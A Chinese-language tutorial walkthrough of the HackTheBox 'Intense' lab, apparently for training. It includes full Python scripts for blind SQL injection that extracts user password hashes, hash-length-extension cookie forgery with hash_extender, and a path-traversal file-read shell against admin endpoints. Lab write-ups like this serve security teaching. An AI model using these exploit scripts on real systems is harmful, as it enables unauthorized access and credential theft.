Intense靶场渗透测试实战教学文档

靶场概述

Intense是HackTheBox(HTB)平台上一个难度中上的靶场，需要参与者具备以下技能：

1. Python源码审计能力
2. SQL注入原理与实践
3. SNMP远程命令执行
4. 栈溢出与ROP技术

0x01 信息收集阶段

端口扫描

TCP端口扫描结果：

nmap -p- --min-rate 10000 -oA scans/nmap-alltcp 10.10.10.195

发现开放端口：

• 22/tcp (SSH)
• 80/tcp (HTTP)

详细服务识别：

nmap -p 22,80 -sC -sV -oA scans/nmap-tcpscripts 10.10.10.195

结果：

• SSH: OpenSSH 7.6p1 Ubuntu
• HTTP: nginx 1.14.0 (Ubuntu)

UDP端口扫描：

nmap -sU -p- --min-rate 10000 -oA scans/nmap-alludp 10.10.10.195

发现开放端口：

• 161/udp (SNMP)

SNMP信息收集

使用snmpwalk探测：

snmpwalk -v 2c -c public 10.10.10.195

获取到系统信息：

• Linux intense 4.15.0-55-generic
• Ubuntu系统

信息汇总

漏洞分析

通过Vulmon查询相关漏洞：

• Ubuntu Bionic 18.04: 无直接可利用漏洞
• Nginx/1.14.0: 无直接可利用漏洞
• OpenSSH 7.6p1: 无直接可利用漏洞

0x02 WEB应用分析

基本信息

• 登录入口: /login
• 默认凭证: guest/guest
• 源码位置: /src.zip
• 功能页面: /submit

目录爆破

gobuster dir -u http://10.10.10.195 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40

发现目录：

• /home
• /login
• /submit
• /admin (403)
• /logout

关键发现

1. 获取到应用源码(src.zip)
2. /submit页面存在SQL注入漏洞
3. 存在管理员入口/admin

0x03 源码审计

登录逻辑分析

登录路由：

@app.route("/postlogin", methods=["POST"])
def postlogin():
    data = try_login(request.form)
    if data:
        resp = make_response("OK")
        session = lwt.create_session(data)
        cookie = lwt.create_cookie(session)
        resp.set_cookie("auth", cookie)
        return resp
    return "Login failed"

try_login函数：

def try_login(form):
    if not form:
        return None
    username = form["username"]
    password = hash_password(form["password"])
    result = query_db("select count(*) from users where username = ? and secret = ?", 
                     (username, password), one=True)
    if result and result[0]:
        return {"username": username, "secret":password}
    return None

会话机制分析

create_session函数：

def create_session(data):
    session = ""
    for k, v in data.items():
        session += f"{k}={v};"
    return session.encode()

create_cookie函数：

def create_cookie(session):
    cookie_sig = sign(session)
    return b64encode(session) + b'.' + b64encode(cookie_sig)

签名函数：

def sign(msg):
    return sha256(SECRET + msg).digest()

SECRET是8-15字节的随机值：

SECRET = os.urandom(randrange(8, 15))

0x04 漏洞利用

SQL注入获取凭证

编写Python脚本爆破用户和密码hash：

#!/usr/bin/env python3
import requests
import string
import sys

def brute_user(res):
    for c in string.ascii_lowercase + string.digits:
        sys.stdout.write(f"\r[*] Trying username: {res}{c.ljust(20)}")
        sys.stdout.flush()
        resp = requests.post("http://10.10.10.195/submitmessage",
            data=f"message='||(select username from users where username LIKE'{res + c}%' and load_extension('a'))||'",
            headers={"Content-Type": "application/x-www-form-urlencoded"},
        )
        if "not authorized" in resp.text:
            resp = requests.post("http://10.10.10.195/submitmessage",
                data=f"message='||(select username from users where username ='{res + c}' and load_extension('a'))||'",
                headers={"Content-Type": "application/x-www-form-urlencoded"},
            )
            if "not authorized" in resp.text:
                print(f"\r[+] Found user: {res}{c.ljust(20)}")
                brute_pass(res + c)
                brute_user(res + c)

def brute_pass(user):
    password = ""
    for i in range(64):
        for c in string.hexdigits:
            sys.stdout.write(f"\r[+] Password: {password}{c}")
            sys.stdout.flush()
            resp = requests.post("http://10.10.10.195/submitmessage",
                data=f"message='||(select secret from users where username ='{user}' and substr(secret, {i+1},1) = '{c}' and load_extension('a'))||'",
                headers={"Content-Type": "application/x-www-form-urlencoded"},
            )
            if "not authorized" in resp.text:
                password += c
                break
    print(f"\r[+] Found secret: {password.ljust(20)}")

brute_user("")
print("\r" + "".ljust(80))

获取到的hash：

• admin: f1fc12010c094016def791e1435ddfdcaeccf8250e36630c0bc93285c2971105
• guest: 84983c60f7daadc1cb8698621f802c0d9f9a3c3c295c810748fb048115c186ec

Cookie伪造攻击

使用hash_extender工具伪造管理员cookie：

/opt/hash_extender/hash_extender \
--secret-min 8 --secret-max 15 \
--data "username=guest;secret=84983c60f7daadc1cb8698621f802c0d9f9a3c3c295c810748fb048115c186ec;" \
--signature <原始签名> \
-f sha256 \
--table \
--append ";username=admin;secret=f1fc12010c094016def791e1435ddfdcaeccf8250e36630c0bc93285c2971105;"

0x05 管理员功能利用

文件读取漏洞

目录遍历：

requests.post("http://10.10.10.195/admin/log/dir",
    data={"logdir": "../"},
    cookies={"auth": admin_cookie},
)

文件读取：

requests.post("http://10.10.10.195/admin/log/view",
    data={"logfile": "../app.ini"},
    cookies={"auth": admin_cookie},
)

自动化利用脚本

#!/usr/bin/env python3
import base64
import binascii
import requests
import subprocess
from cmd import Cmd

class Term(Cmd):
    prompt = "intense> "
    
    def __init__(self):
        Cmd.__init__(self)
        # 获取guest cookie
        resp = requests.post("http://10.10.10.195/postlogin",
            data={"username": "guest", "password": "guest"},
            headers={"Content-Type": "application/x-www-form-urlencoded; charset=UTF8"},
        )
        orig_cookie = resp.headers["Set-Cookie"].split("=", 1)[1]
        cookie_data_b64, cookie_sig_b64 = orig_cookie.split(".")
        cookie_data = base64.b64decode(cookie_data_b64).decode()
        cookie_sig_hex = binascii.hexlify(base64.b64decode(cookie_sig_b64)).decode()
        print("[+] Guest Cookie acquired")
        
        # 使用hash_extender伪造cookie
        cmd = "/opt/hash_extender/hash_extender --secret-min 8 --secret-max 15 "
        cmd += "--data 'username=guest;secret=84983c60f7daadc1cb8698621f802c0d9f9a3c3c295c810748fb048115c186ec;' "
        cmd += f"--signature {cookie_sig_hex} -f sha256 --table "
        cmd += "--append ';username=admin;secret=f1fc12010c094016def791e1435ddfdcaeccf8250e36630c0bc93285c2971105;'"
        
        hash_extender = (subprocess.check_output(cmd.split(" ")).strip().decode().split("\n"))
        print("[*] Generated hash extensions for 8 to 15 byte secrets")
        
        for test_hash in hash_extender:
            new_cookie_data = base64.b64encode(binascii.unhexlify(test_hash.split(" ")[-1])).decode()
            new_cookie_sig = base64.b64encode(binascii.unhexlify(test_hash.split(" ")[-2])).decode()
            new_cookie = f"{new_cookie_data}.{new_cookie_sig}"
            resp = requests.get("http://10.10.10.195/home", cookies=dict(auth=new_cookie))
            if not "You can login with the username and password" in resp.text:
                print(f"[+] Identified working cookie from generated options!")
                self.cookie = new_cookie
                break
    
    def do_ls(self, args):
        "Usage: ls [path relative to /]"
        resp = requests.post("http://10.10.10.195/admin/log/dir",
            data={"logdir": f"{args}"},
            cookies={"auth": self.cookie},
        )
        print(resp.text)
    
    def do_dir(self, args):
        "Usage: dir [path relative to /]"
        self.do_ls(args)
    
    def do_cat(self, args):
        "Usage: cat [file path relative to /]"
        resp = requests.post("http://10.10.10.195/admin/log/view",
            data={"logfile": f"{args}"},
            cookies={"auth": self.cookie},
        )
        print(resp.text)
    
    def precmd(self, args):
        if len(args.split(" ")) < 2:
            c = args.split(" ", 1)[0]
            args = f"help {c}"
        return args

term = Term()
try:
    term.cmdloop()
except KeyboardInterrupt:
    print()

0x06 获取User权限

使用文件读取漏洞获取user.txt：

intense> ls /home/user/user.txt
#707580d2...

总结

本靶场渗透测试的关键路径：

1. 通过SQL注入获取管理员凭证hash
2. 分析会话机制，利用hash长度扩展攻击伪造管理员cookie
3. 利用管理员功能中的文件读取漏洞获取敏感信息

参考资源

• https://0xdf.gitlab.io/2020/11/14/htb-intense.html
• https://www.romanh.de/writeup/htb-intense
• MS08067实验室官网: www.ms08067.com